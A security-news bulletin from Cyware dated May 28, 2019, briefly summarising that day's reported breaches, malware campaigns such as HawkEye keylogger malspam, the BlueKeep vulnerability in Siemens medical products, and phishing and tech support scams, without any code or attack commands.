Go to listing page

Cyware Daily Threat Intelligence, May 28, 2019

Cyware Daily Threat Intelligence, May 28, 2019

Share Blog Post

Malspam has always been a preferred attack vector for threat actors to drop dangerous malware. Given the ease with which they are carried out, malspam attacks have taken a toll on a range of businesses and users. Recently, security researchers have come across a series of malspam campaigns that are being used to distribute both HawkEye Reborn v8.0 and HawkEye Reborn v9.0. These campaigns are actively targeting business employees and customers in an effort to steal both account credentials and other sensitive details.   

New details regarding the recently disclosed BlueKeep vulnerability has also surfaced in the past 24 hours. Several medical products made by Siemens Healthineers, have been discovered to be impacted by the vulnerability, tracked as CVE-2019-0708. It impacts Windows Remote Desktop Services (RDS), allowing attackers to perform remote code execution and hijack an entire network. Siemens has published six security advisories describing the impact of this vulnerability on its products.

Top Breaches Reported in the Last 24 Hours

The city of Laredo suffers an attack
The city of Laredo’s document management system was encrypted following a ransomware attack on May 22, 2019. However, the city’s officials were quick at resolving the matter. They contained the malware immediately and all the systems were up for operation from May 23, 2019. Computers used by the Fire, Police, Utilities, and Health departments were down until May 24, 2019 to contain the situation, which led to manual

Yidao Yongche targeted
Chinese-based ride-hailing firm Yidao Yongche had fallen victim to multiple cyber attacks on May 25 and May 26, 2019. This had caused its server to shut down and its core data to be encrypted. It is reported that the attackers demanded a huge amount of Bitcoin to restore the encrypted data. The firm has informed the Beijing Cyber Police Center about the issue and is working on formulating a compensation plan to protect the impacted users.

Travis CI keeps logs
A team of seven bug bounty hunters has found that several Continuous Integration (CI) services still contain secrets of many companies hidden inside its build logs. This includes Travis CI, Circle CI, and GitLab CI. Researchers have urged users of CI services to review their CI build logs for any sensitive tokens that may leak through the basic pattern filtering procedures.  

Top Malware Reported in the Last 24 Hours

HawkEye keylogger returns
Two versions of HawkEye keylogger are being used in massive malspam campaigns targeting business users worldwide. The sole purpose of the campaigns is to steal account details and other sensitive details of users. Attackers are using spam servers located in Estonia to spam emails that appear to come from Spanish banks or legitimate companies. The email comes with an attachment containing a fake commercial invoice which, if opened, will drop the malware onto the victim’s system.

New persistent malware infection
Attackers attempted a persistent malware infection on WordPress and Joomla based websites by using a cron command which schedules the download of malware from a third-party domain named hestonsflorists[.]com. The important aspect of the infection process is that the malware re-infects the targeted website even after the website owner has cleaned their website files or restored from a backup.  

Top Vulnerabilities Reported in the Last 24 Hours

Siemens medical products vulnerable
Several products made by Siemens Healthineers, are affected by a recently patched Windows vulnerability tracked as BlueKeep (CVE-2019-0708). The flaw has been described as wormable and can allow an unauthenticated attacker to execute code and take control of a device without any user interaction. The flaw affects some older versions of Windows OS such as 7, Server 2008, XP, Server 2003.

A bug in WalletGenerator.net
A vulnerability has been disclosed in the online cryptocurrency paper wallet creator WalletGenerator.net. The bug caused private/public keys to be issued to multiple users. The flaw exists due to the changes in code that is being served via WalletGenerator.net. The bad code was discovered in August 2018, but it was only patched in May 2019.

Top Scams Reported in the Last 24 Hours

New phishing scam targets ANZ customers
Australia and New Zealand Banking Group (ANZ) has warned its customers about a new phishing scam that is aimed at stealing users’ banking details. The email appears to come from ANZ and mentions a successful BPAY transaction. It asks the recipients to view the transaction by visiting their ‘Transaction History’ through a link available in the email.  When users click on the link, they are redirected to the spoofed website of ANZ which asks for their login details. Upon entering the login details, users are redirected to a page that simulates a blocked account with 3 challenging questions to be answered.

Tech support scam
Three scammers have been arrested for allegedly duping people and stealing a sum of $1.3 million in different tech support scams. These scammers pretended to be from major tech companies and called victims to inform that their computers were infected with a virus. They also sent fake alert messages which included a link to a fraudulent website. The website enabled the convicts to get remote access to victims’ computers. Most of the victims paid between $225 and $799 for fake multi-year service plans.


hawkeye keylogger malware
siemens healthineers
australia and new zealand banking group anz

Posted on: May 28, 2019

More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.

The Virtual Cyber Fusion Suite